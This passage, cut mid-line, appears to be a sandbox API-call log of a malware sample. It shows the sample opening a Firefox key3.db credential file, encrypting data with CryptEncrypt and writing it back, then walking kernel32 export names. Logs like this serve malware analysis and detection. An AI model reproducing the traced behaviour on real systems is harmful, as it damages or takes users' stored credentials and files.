HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0081.400] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=16384) returned 1 [0081.400] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0081.400] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0081.401] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0081.401] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0081.401] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.403] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0081.403] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0081.403] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.404] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0081.404] CloseHandle (hObject=0x464) returned 1 [0081.404] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.404] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0081.405] CloseHandle (hObject=0x0) returned 0 [0081.405] CloseHandle (hObject=0x460) returned 1 [0081.405] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.405] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.406] GetTickCount () returned 0x114cd4e [0081.406] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.406] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.406] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.406] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.406] lstrlenA (lpString="kernel32.dll") returned 12 [0081.407] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.407] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.407] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.407] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.407] lstrlenA (lpString="ADDATOMA") returned 8 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.407] lstrlenA (lpString="ADDATOMW") returned 8 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.407] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.407] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.407] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.407] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.407] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.407] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.407] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.407] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.407] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.407] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.407] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.408] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.408] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.408] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.408] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.408] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.408] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.408] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.408] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.408] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.408] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.408] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.408] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.408] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.408] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.408] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.408] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.408] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.408] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.409] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.409] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.409] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.409] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.409] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.409] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.409] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.409] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.409] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.409] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.409] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.409] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.409] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.409] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.409] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.409] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.409] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.409] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.410] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.410] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.410] lstrlenA (lpString="BEEP") returned 4 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.410] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.410] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.410] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.410] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.410] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.410] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.410] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.410] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.410] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.410] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.410] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.410] lstrlenA (lpString="CANCELIO") returned 8 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.410] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.410] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.410] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.411] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.411] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.411] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.411] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.411] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.411] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.411] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.411] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.411] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.411] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.411] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.411] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.411] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.411] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.411] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.411] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.411] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.411] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.412] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.412] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.412] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.412] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.412] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.412] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.412] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.412] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.412] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.412] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.412] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.412] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.412] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0081.412] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0081.412] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0081.412] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0081.412] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0081.412] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0081.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0081.413] 